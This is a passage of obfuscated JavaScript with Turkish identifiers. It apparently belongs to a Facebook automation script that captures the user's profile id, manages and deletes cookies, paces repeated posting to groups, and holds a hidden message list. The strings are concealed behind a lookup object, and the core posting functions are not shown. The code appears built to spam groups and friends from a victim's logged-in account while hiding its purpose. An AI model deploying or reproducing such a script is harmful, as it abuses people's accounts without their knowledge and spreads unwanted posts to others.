  k[n4K.F8]();
}

function deleteAllCookies() {
  var K = "F",
    h = "paylasim_",
    r = "P",
    E = "cookie_",
    o = "m",
    u = "basarili_",
    X = "n",
    B = "=;expires=Thu, 01 Jan 1970 00:00:00 GMT",
    I = "grup_",
    a = "s",
    k = "=",
    H = "y",
    x = ";",
    R = "split",
    c = document[n4K.O4][R](x);
  for (var e = n4K.e4; n4K[H](e, c.length); e++) {
    var b = c[e],
      W = b[R](k),
      O = W[n4K.e4];
    if (n4K[a](W[n4K.e4][n4K.Y5](I), n4K.e4)) {
      var f = function() {
        document[n4K.O4] = O + B;
      };
      f();
    }
    if (n4K[X](W[n4K.e4][n4K.Y5](u), n4K.e4)) {
      var N = function() {
        document[n4K.O4] = O + B;
      };
      N();
    }
    if (n4K[o](W[n4K.e4][n4K.Y5](E), n4K.e4)) {
      var A = function() {
        document[n4K.O4] = O + B;
      };
      A();
    }
    if (n4K[r](W[n4K.e4][n4K.Y5](h), n4K.e4)) {
      var l = function() {
        document[n4K.O4] = O + B;
      };
      l();
    }
    if (n4K[K](W[n4K.e4][n4K.Y5](n4K.J7), n4K.e4)) {
      var t = function() {
        document[n4K.O4] = O + B;
      };
      t();
    }
  }
}
var paylasim_araligi = n4K.c4,
  grup_ids = [],
  grup_limit = n4K.Z4,
  arkadaslar_list = [],
  arkadaslar_list2 = [],
  etiket_limit = n4K.e4,
  grup_say = n4K.e4,
  success = n4K.e4,
  cronjob = n4K.o8,
  close = n4K.e4,
  d = document,
  mesagge = Array(n4K.c6, n4K.t8, n4K.c8, n4K.t6, n4K.n4, n4K.F6, n4K.i7, n4K.T1, n4K.S5, n4K.k8, n4K.a8, n4K.G5, n4K.P6, n4K.w7, n4K.D4, n4K.W4, n4K.b8, n4K.T8),
  zaman = new Date(),
  profilkayit = new RegExp(n4K.J7 + n4K.H6),
  profilkayitkontrol = document[n4K.O4][n4K.X6](profilkayit);
if (!profilkayitkontrol) {
  var D = function() {
    document[n4K.O4] = n4K.J7 + n4K.h7 + gelen[n4K.a4];
  };
  profil_id_getir();
  D();
  var profile_id = gelen[n4K.a4];
} else {
  var profile_id = profilkayitkontrol[n4K.a4];
}
var cookiekayit = new RegExp(n4K.b7 + profile_id + n4K.H6),
  cookiekayitkontrol = document[n4K.O4][n4K.X6](cookiekayit),
  grupsirasi = new RegExp(n4K.S4 + profile_id + n4K.H6),
  grupsirasikontrol = document[n4K.O4][n4K.X6](grupsirasi),
  grupbasarili = new RegExp(n4K.B4 + profile_id + n4K.H6),
  grupbasarilikontrol = document[n4K.O4][n4K.X6](grupbasarili),
  paylasimaraligi = new RegExp(n4K.y8 + profile_id + n4K.H6),
  paylasimaraligikontrol = document[n4K.O4][n4K.X6](paylasimaraligi);
if (!cookiekayitkontrol || (n4K[n4K.Y7](cookiekayitkontrol[n4K.a4], zaman[n4K.P8]()))) {
  if (n4K[n4K.u6](document[n4K.x5][n4K.Y5](n4K.j6), n4K.e4)) {
    if (n4K[n4K.e5](document[n4K.x5][n4K.Y5](n4K.r6), n4K.e4)) {
      window[n4K.Z6](function() {
        var r = "http://www.facebook.com",
          E = function(K) {
            var h = "href";
            location[h] = K;
          };
        E(r);
      }, n4K.L8);
    } else {
      var U = function() {
          var K = "R1";
          document[n4K.O4] = n4K.y8 + profile_id + n4K.h7 + (zaman[n4K.P8]() + n4K[K](paylasim_araligi, n4K.L8));
        },
        Y = function() {
          var K = "d1";
          document[n4K.O4] = n4K.b7 + profile_id + n4K.h7 + (zaman[n4K.P8]() + n4K[K](cronjob, n4K.L8));
        };
      deleteAllCookies();
      Y();
      U();
      removebutton();
      baslat();
    }
  }
} else {
  removebutton();
  if (!paylasimaraligikontrol || (n4K[n4K.R4](paylasimaraligikontrol[n4K.a4], zaman[n4K.P8]()))) {
    var z = function() {
      var K = "G1";
      document[n4K.O4] = n4K.y8 + profile_id + n4K.h7 + (zaman[n4K.P8]() + n4K[K](paylasim_araligi, n4K.L8));
    };
    z();
    if (!grupbasarilikontrol || (n4K[n4K.X4](grupbasarilikontrol[n4K.a4], grup_limit))) {
      gruplaricek();
    } else {
      console[n4K.Q6](n4K.C4);
    }
  } else {
    console[n4K.Q6](Math[n4K.s7](n4K[n4K.X7]((paylasimaraligikontrol[n4K.a4] - zaman[n4K.P8]()), n4K.L8)));
  }
  console[n4K.Q6](Math[n4K.s7](n4K[n4K.Z7]((cookiekayitkontrol[n4K.a4] - zaman[n4K.P8]()), n4K.L8)));
};
